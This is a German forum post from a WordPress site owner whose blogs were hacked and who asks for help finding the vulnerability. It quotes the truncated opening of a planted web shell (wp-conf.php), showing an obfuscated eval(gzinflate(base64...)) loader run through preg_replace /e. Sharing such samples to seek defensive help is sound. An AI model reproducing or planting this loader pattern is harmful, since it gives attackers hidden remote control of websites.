Hallo,
ich habe ein großes Problem, all meine Seiten sind vor paar Tagen gehackt worden und es werden Spammails verschickt. Ich habe über 10 Wordpress Blogs, alle sind aktualisiert und ich habe mittlerweile die Passwörter geändert. Auch die Themes habe ich aktualisiert und nicht benötigte Themes gelöscht. Auch alle Plugins habe ich aktualisiert. Doch jeden Tag kommt neuer Schadcode in all meine Hauptverzeichnisse hinzu. Heute habe ich über 200 Dateien mit Schadcode gelöscht bzw editiert. Habe allein heute über 2 Stunden dafür benötigt.
Ich weiß langsam nicht mehr weiter, mein Provider kann auch nicht helfen. Kann mir jemand von euch weiterhelfen? ich muss unbedingt die Sicherheitslücke herausfinden... gibt es bestimmte Sicherheitslücken die bekannt sind bzw was kann ich tun um die Sicherheitslücke herauszufinden? Gibt es Sicherheitslücken die in den letzten Tagen/Wochen bekannt geworden sind?
Der mit Abstand meiste Schadcode befand sich in einem bestimmten hauptverzeichnis. ich habe davon ein Screenshot gemacht und es hier angehängt. Vielleicht kann damit jemand was anfangen?
In allen meiner Hauptverzeichnissen der jeweiligen Domains befanden sich ca 10 php Dateien mit vielen Zahlen im Dateinamen, ungefähr so: n32384934835.php
In einigen Verzeichnissen befanden sich zusätzliche php Dateien wie z.B. : admin.php, menu.php, index.php
Heute wurden zusätzlich Dateien ins hauptverzeichnis der jeweiligen Domains hochgeladen mit folgendem Dateinamen: wp-conf.php und mit folgendem Inhalt:
<?php if(isset($_GET["t1211n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73........ etc etc
Ich muss schnellstmöglich die Sicherheitslücke finden... wäre nett wenn mir jemand weiterhelfen kann.